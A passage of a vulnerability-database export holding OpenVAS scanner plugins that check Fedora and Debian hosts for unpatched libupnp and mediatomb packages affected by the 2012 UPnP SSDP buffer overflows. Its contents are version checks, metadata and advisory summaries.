}\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310865371", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865371", "type": "openvas", "title": "Fedora Update for mediatomb FEDORA-2013-2377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2377\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865371\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:05 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-2377\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2377\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediatomb'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"mediatomb on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:10:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of mediatomb", "modified": "2018-01-22T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:865371", "href": "http://plugins.openvas.org/nasl.php?oid=865371", "type": "openvas", "title": "Fedora Update for mediatomb FEDORA-2013-2377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediatomb FEDORA-2013-2377\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user\n interface, it allows you to stream your digital media through your home\n network and listen to/watch it on a variety of UPnP compatible devices.\n\n MediaTomb implements the UPnP MediaServer V 1.0 specification that can\n be found on <A HREF= &qt http://www.upnp.org/. &qt >http://www.upnp.org/.</A>\";\n\n\ntag_affected = \"mediatomb on Fedora 18\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099022.html\");\n script_id(865371);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:05 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-2377\");\n script_name(\"Fedora Update for mediatomb FEDORA-2013-2377\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mediatomb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediatomb\", rpm:\"mediatomb~0.12.1~23.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-23T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865345", "href": "http://plugins.openvas.org/nasl.php?oid=865345", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1713\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_affected = \"libupnp on Fedora 16\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\");\n script_id(865345);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:13:21 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1713\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1713\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865359", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"libupnp on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865359\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:50 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1765\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1765\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:08:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-18T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865359", "href": "http://plugins.openvas.org/nasl.php?oid=865359", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"The Universal Plug and Play (UPnP) SDK for Linux provides\n support for building UPnP-compliant control points, devices,\n and bridges on Linux.\";\ntag_affected = \"libupnp on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\");\n script_id(865359);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:50 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1765\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1765\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libupnp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Multiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.", "modified": "2019-03-18T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:1361412562310892615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892615", "type": "openvas", "title": "Debian Security Advisory DSA 2615-1 (libupnp4 - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2615.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 2615-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892615\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2012-5964\", \"CVE-2012-5962\", \"CVE-2012-5961\", \"CVE-2012-5959\", \"CVE-2012-5965\", \"CVE-2012-5963\", \"CVE-2012-5960\", \"CVE-2012-5958\");\n script_name(\"Debian Security Advisory DSA 2615-1 (libupnp4 - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-01 00:00:00 +0100 (Fri, 01 Feb 2013)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2615.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"libupnp4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), these problems have been fixed in\nversion 1.8.0~svn20100507-1+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.0~svn20100507-1.2.\n\nWe recommend that you upgrade your libupnp4 packages.\");\n script_tag(name:\"summary\", value:\"Multiple stack-based buffer overflows were discovered in libupnp4, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on\nlibupnp4 could generate a buffer overflow, overwriting the stack, leading to\nthe daemon crash and possible remote code execution.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libupnp4\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dbg\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dev\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-doc\", ver:\"1.8.0~svn20100507-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dbg\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-dev\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libupnp4-doc\", ver:\"1.8.0~svn20100507-1.2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865353", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1734", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1734\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865353\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:14:13 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-1734\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1734\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"libupnp on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Multiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.", "modified": "2017-07-07T00:00:00", "published": "2013-02-01T00:00:00", "id": "OPENVAS:892614", "href": "http://plugins.openvas.org/nasl.php?oid=892614", "type": "openvas", "title": "Debian Security Advisory DSA 2614-1 (libupnp - several vulnerabilities)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2614.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2614-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"libupnp on Debian Linux\";\ntag_insight = \"The Portable SDK for UPnP Devices (libupnp) provides developers with 